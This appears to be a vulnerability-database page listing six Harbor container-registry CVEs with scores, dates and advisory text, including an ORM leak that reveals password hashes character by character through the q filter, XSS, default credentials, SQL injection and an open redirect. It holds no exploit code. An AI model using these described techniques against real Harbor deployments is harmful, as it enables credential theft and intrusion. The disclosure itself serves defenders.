Harbor
Products
1- 6 CVEs
Recent CVEs
6| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-30086 | Med | 0.25 | 4.9 | 0.00 | Jul 25, 2025 | CNCF Harbor 2.13.x before 2.13.1 and 2.12.x before 2.12.4 allows information disclosure by administrators who can exploit an ORM Leak present in the /api/v2.0/users endpoint to leak users' password hash and salt values. The q URL parameter allows a user to filter users by any column, and filter password=~ could be abused to leak out a user's password hash character by character. An attacker with administrator access could exploit this to leak highly sensitive information stored in the Harbor database. All endpoints that support the q URL parameter are vulnerable to this ORM leak attack. | ||
| CVE-2025-32019 | Med | 0.20 | 4.1 | 0.00 | Jul 23, 2025 | Harbor is an open source trusted cloud native registry project that stores, signs, and scans content. Versions 2.11.2 and below, as well as versions 2.12.0-rc1 and 2.13.0-rc1, contain a vulnerability where the markdown field in the info tab page can be exploited to inject XSS code. This is fixed in versions 2.11.3 and 2.12.3. | ||
| CVE-2026-4404 | 0.00 | — | 0.00 | Mar 23, 2026 | Use of hard coded credentials in GoHarbor Harbor version 2.15.0 and below, allows attackers to use the default password and gain access to the web UI. | |||
| CVE-2024-22278 | 0.00 | — | 0.00 | Aug 2, 2024 | Incorrect user permission validation in Harbor <v2.9.5 and Harbor <v2.10.3 allows authenticated users to modify configurations. | |||
| CVE-2024-22261 | 0.00 | — | 0.00 | Jun 10, 2024 | SQL-Injection in Harbor allows priviledge users to leak the task IDs | |||
| CVE-2024-22244 | 0.00 | — | 0.00 | Jun 10, 2024 | Open Redirect in Harbor <=v2.8.4, <=v2.9.2, and <=v2.10.0 may redirect a user to a malicious site. |
- risk 0.25cvss 4.9epss 0.00
CNCF Harbor 2.13.x before 2.13.1 and 2.12.x before 2.12.4 allows information disclosure by administrators who can exploit an ORM Leak present in the /api/v2.0/users endpoint to leak users' password hash and salt values. The q URL parameter allows a user to filter users by any column, and filter password=~ could be abused to leak out a user's password hash character by character. An attacker with administrator access could exploit this to leak highly sensitive information stored in the Harbor database. All endpoints that support the q URL parameter are vulnerable to this ORM leak attack.
- risk 0.20cvss 4.1epss 0.00
Harbor is an open source trusted cloud native registry project that stores, signs, and scans content. Versions 2.11.2 and below, as well as versions 2.12.0-rc1 and 2.13.0-rc1, contain a vulnerability where the markdown field in the info tab page can be exploited to inject XSS code. This is fixed in versions 2.11.3 and 2.12.3.
- CVE-2026-4404Mar 23, 2026risk 0.00cvss —epss 0.00
Use of hard coded credentials in GoHarbor Harbor version 2.15.0 and below, allows attackers to use the default password and gain access to the web UI.
- CVE-2024-22278Aug 2, 2024risk 0.00cvss —epss 0.00
Incorrect user permission validation in Harbor <v2.9.5 and Harbor <v2.10.3 allows authenticated users to modify configurations.
- CVE-2024-22261Jun 10, 2024risk 0.00cvss —epss 0.00
SQL-Injection in Harbor allows priviledge users to leak the task IDs
- CVE-2024-22244Jun 10, 2024risk 0.00cvss —epss 0.00
Open Redirect in Harbor <=v2.8.4, <=v2.9.2, and <=v2.10.0 may redirect a user to a malicious site.